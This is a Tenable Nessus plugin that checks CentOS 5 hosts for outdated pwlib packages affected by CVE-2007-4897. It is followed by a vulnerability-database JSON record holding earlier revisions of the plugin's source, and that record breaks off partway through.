ID CENTOS_RHSA-2007-0932.NASL Type nessus Reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-11-02T00:00:00
Description
Updated pwlib packages that fix a security issue are now available for
Red Hat Enterprise Linux 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
PWLib is a library used to support cross-platform applications.
In Red Hat Enterprise Linux 5, the Ekiga teleconferencing application
uses PWLib.
A memory management flaw was discovered in PWLib. An attacker could
use this flaw to crash an application, such as Ekiga, which is linked
with pwlib (CVE-2007-4897).
Users should upgrade to these updated packages which contain a
backported patch to correct this issue.
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2007:0932 and
# CentOS Errata and Security Advisory 2007:0932 respectively.
#
include("compat.inc");
if (description)
{
script_id(43653);
script_version("1.12");
script_cvs_date("Date: 2019/10/25 13:36:03");
script_cve_id("CVE-2007-4897");
script_xref(name:"RHSA", value:"2007:0932");
script_name(english:"CentOS 5 : pwlib (CESA-2007:0932)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote CentOS host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"Updated pwlib packages that fix a security issue are now available for
Red Hat Enterprise Linux 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
PWLib is a library used to support cross-platform applications.
In Red Hat Enterprise Linux 5, the Ekiga teleconferencing application
uses PWLib.
A memory management flaw was discovered in PWLib. An attacker could
use this flaw to crash an application, such as Ekiga, which is linked
with pwlib (CVE-2007-4897).
Users should upgrade to these updated packages which contain a
backported patch to correct this issue."
);
# https://lists.centos.org/pipermail/centos-announce/2007-October/014288.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?4ea60df5"
);
# https://lists.centos.org/pipermail/centos-announce/2007-October/014289.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?137296a2"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected pwlib packages."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_cwe_id(399);
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:pwlib");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:pwlib-devel");
script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:5");
script_set_attribute(attribute:"vuln_publication_date", value:"2007/09/14");
script_set_attribute(attribute:"patch_publication_date", value:"2007/10/09");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/06");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"CentOS Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/CentOS/release");
if (isnull(release) || "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS");
os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS");
os_ver = os_ver[1];
if (! preg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 5.x", "CentOS " + os_ver);
if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu);
flag = 0;
if (rpm_check(release:"CentOS-5", reference:"pwlib-1.10.1-7.0.1.el5")) flag++;
if (rpm_check(release:"CentOS-5", reference:"pwlib-devel-1.10.1-7.0.1.el5")) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : rpm_report_get()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "pwlib / pwlib-devel");
}
{"id": "CENTOS_RHSA-2007-0932.NASL", "bulletinFamily": "scanner", "title": "CentOS 5 : pwlib (CESA-2007:0932)", "description": "Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.", "published": "2010-01-06T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/43653", "reporter": "This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?137296a2", "http://www.nessus.org/u?4ea60df5"], "cvelist": ["CVE-2007-4897"], "type": "nessus", "lastseen": "2019-11-01T02:15:06", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-4897"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Updated pwlib packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application uses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could use this flaw to crash an application, such as Ekiga, which is linked with pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a backported patch to correct this issue.", "edition": 1, "enchantments": {}, "hash": "7e668ffdef7e799c827dd7f864f7b1b8301ba7d23915a211f20945dbe42599a1", "hashmap": [{"hash": "6bb61129529759827867c35bb8dc1061", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "1137153b16a35725749f89b6c786264e", "key": "modified"}, {"hash": "98bb263b4c43031df9d6914eeb9842bf", "key": "cvelist"}, {"hash": "00194e24f3ec13da467c0b27178fe07b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "30063089f1dd6a0b624bd5cfdc2669c6", "key": "sourceData"}, {"hash": "95ee216e5a483732554f971b1708ad99", "key": "pluginID"}, {"hash": "a0c10c3eb0dc977408511d6a8d771108", "key": "references"}, {"hash": "fd5b0ac2be0f5feddb6b303186cd9f6f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "23ce845004d25b65f635b88c2da58bea", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=43653", "id": "CENTOS_RHSA-2007-0932.NASL", "lastseen": "2016-09-26T17:26:44", "modified": "2015-05-19T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.2", "pluginID": "43653", "published": "2010-01-06T00:00:00", "references": ["http://www.nessus.org/u?71b317cd", "http://www.nessus.org/u?fb2bbfa3"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0932 and \n# CentOS Errata and Security Advisory 2007:0932 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43653);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2015/05/19 23:34:17 $\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_osvdb_id(41647);\n script_xref(name:\"RHSA\", value:\"2007:0932\");\n\n script_name(english:\"CentOS 5 : pwlib (CESA-2007:0932)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2007-October/014288.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71b317cd\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2007-October/014289.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb2bbfa3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pwlib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 5 : pwlib (CESA-2007:0932)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:44"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:centos:centos:pwlib-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:pwlib"], "cvelist": ["CVE-2007-4897"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Updated pwlib packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application uses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could use this flaw to crash an application, such as Ekiga, which is linked with pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a backported patch to correct this issue.", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-02-21T01:12:52", "references": [{"idList": ["CVE-2007-4897"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310830218", "OPENVAS:840204", "OPENVAS:830218"], "type": "openvas"}, {"idList": ["CESA-2007:0932"], "type": "centos"}, {"idList": ["DEBIAN:B539EAF12FF57A243523C118FB3AAA47:81EF2"], "type": "debian"}, {"idList": ["SSV:12761", "SSV:66737"], "type": "seebug"}, {"idList": ["EDB-ID:9241"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:79578"], "type": "packetstorm"}, {"idList": ["USN-561-1"], "type": "ubuntu"}, {"idList": ["RHSA-2007:0932"], "type": "redhat"}, {"idList": ["REDHAT-RHSA-2007-0932.NASL", "MANDRAKE_MDKSA-2007-206.NASL", "SL_20071008_PWLIB_ON_SL5_X.NASL", "UBUNTU_USN-561-1.NASL"], "type": "nessus"}]}, "score": {"modified": "2019-02-21T01:12:52", "value": 5.2, "vector": "NONE"}}, "hash": "b040f31170c4c0271fb92f0ab0e5462e64c6266250e2961e6fa29fa4aa9ea364", "hashmap": [{"hash": "139fdc6a55a267911418f3725827f166", "key": "references"}, {"hash": "6bb61129529759827867c35bb8dc1061", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "98bb263b4c43031df9d6914eeb9842bf", "key": "cvelist"}, {"hash": "00194e24f3ec13da467c0b27178fe07b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "95ee216e5a483732554f971b1708ad99", "key": "pluginID"}, {"hash": "fd5b0ac2be0f5feddb6b303186cd9f6f", "key": "published"}, {"hash": "5d654a44711975a6bf29c35562fc6019", "key": "cpe"}, {"hash": "891eb923404765e9588e0b190b3a92e7", "key": "sourceData"}, {"hash": "23ce845004d25b65f635b88c2da58bea", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=43653", "id": "CENTOS_RHSA-2007-0932.NASL", "lastseen": "2019-02-21T01:12:52", "modified": "2018-11-10T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "43653", "published": "2010-01-06T00:00:00", "references": ["http://www.nessus.org/u?137296a2", "http://www.nessus.org/u?4ea60df5"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0932 and \n# CentOS Errata and Security Advisory 2007:0932 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43653);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_xref(name:\"RHSA\", value:\"2007:0932\");\n\n script_name(english:\"CentOS 5 : pwlib (CESA-2007:0932)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014288.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ea60df5\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-October/014289.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?137296a2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pwlib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 5 : pwlib (CESA-2007:0932)", "type": "nessus", "viewCount": 6}, "differentElements": ["cvss", "description", "reporter", "modified", "sourceData", "href"], "edition": 9, "lastseen": "2019-02-21T01:12:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:centos:centos:pwlib-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:pwlib"], "cvelist": ["CVE-2007-4897"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Updated pwlib packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application uses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could use this flaw to crash an application, such as Ekiga, which is linked with pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a backported patch to correct this issue.", "edition": 5, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "03be3a09e10328805ce53750b334c3e064f3d6857b8a152cf775ece829447cd2", "hashmap": [{"hash": "6bb61129529759827867c35bb8dc1061", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "98bb263b4c43031df9d6914eeb9842bf", "key": "cvelist"}, {"hash": "a03d359fb0b4e439f50091cee1f89df6", "key": "modified"}, {"hash": "22862a08f1ec03e87121cf9ede0e6f03", "key": "sourceData"}, {"hash": "00194e24f3ec13da467c0b27178fe07b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "95ee216e5a483732554f971b1708ad99", "key": "pluginID"}, {"hash": "a0c10c3eb0dc977408511d6a8d771108", "key": "references"}, {"hash": "fd5b0ac2be0f5feddb6b303186cd9f6f", "key": "published"}, {"hash": "5d654a44711975a6bf29c35562fc6019", "key": "cpe"}, {"hash": "23ce845004d25b65f635b88c2da58bea", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=43653", "id": "CENTOS_RHSA-2007-0932.NASL", "lastseen": "2018-09-02T00:10:34", "modified": "2018-08-09T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "43653", "published": "2010-01-06T00:00:00", "references": ["http://www.nessus.org/u?71b317cd", "http://www.nessus.org/u?fb2bbfa3"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0932 and \n# CentOS Errata and Security Advisory 2007:0932 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43653);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/09 17:06:35\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_xref(name:\"RHSA\", value:\"2007:0932\");\n\n script_name(english:\"CentOS 5 : pwlib (CESA-2007:0932)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application\nuses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could\nuse this flaw to crash an application, such as Ekiga, which is linked\nwith pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a\nbackported patch to correct this issue.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2007-October/014288.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71b317cd\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2007-October/014289.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb2bbfa3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pwlib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pwlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-1.10.1-7.0.1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pwlib-devel-1.10.1-7.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 5 : pwlib (CESA-2007:0932)", "type": "nessus", "viewCount": 0}, "differentElements": ["sourceData"], "edition": 5, "lastseen": "2018-09-02T00:10:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:centos:centos:pwlib-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:pwlib"], "cvelist": ["CVE-2007-4897"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Updated pwlib packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPWLib is a library used to support cross-platform applications.\n\nIn Red Hat Enterprise Linux 5, the Ekiga teleconferencing application uses PWLib.\n\nA memory management flaw was discovered in PWLib. An attacker could use this flaw to crash an application, such as Ekiga, which is linked with pwlib (CVE-2007-4897).\n\nUsers should upgrade to these updated packages which contain a backported patch to correct this issue.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "7307734de580eabbb2de89dcd21050bcbfde7f394a2a5074c47e8ee26f12cf21", "hashmap": [{"hash": "6bb61129529759827867c35bb8dc1061", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "1137153b16a35725749f89b6c786264e", "key": "modified"}, {"hash": "98bb263b4c43031df9d6914eeb9842bf", "key": "cvelist"}, {"hash": "00194e24f3ec13da467c0b27178fe07b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "30063089f1dd6a0b624bd5cfdc2669c6", "key": "sourceData"}, {"hash": "95ee216e5a483732554f971b1708ad99", "key": "pluginID"}, {"hash": "a0c10c3eb0dc977408511d6a8d771108", "key": "references"}, {"hash": "fd5b0ac2be0f5feddb6b303186cd9f6f", "key": "published"}, {"hash": "5d654a44711975a6bf29c35562fc6019", "key": "cpe"}, {"hash": "23ce845004d25b65f635b88c2da58bea", "key": "title"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=43653", "id": "CENTOS_RHSA-2007-0932.NASL", "lastseen": "2017-10-29T13:45:58", "modified": "2015-05-19T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "43653", "published": "2010-01-06T00:00:00", "references": ["http://www.nessus.org/u?71b317cd", "http://www.nessus.org/u?fb2bbfa3"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0932 and \n# CentOS Errata and Security Advisory 2007:0932 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43653);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2015/05/19 23:34:17 $\");\n\n script_cve_id(\"CVE-2007-4897\");\n script_osvdb_id(41647);\n script_xref(name:\"RHSA\", value:\"2007:0932\");\n\n script_name(english:\"CentOS 5 : pwlib (CESA-2007:0932)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pwlib packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPWLib is a library used 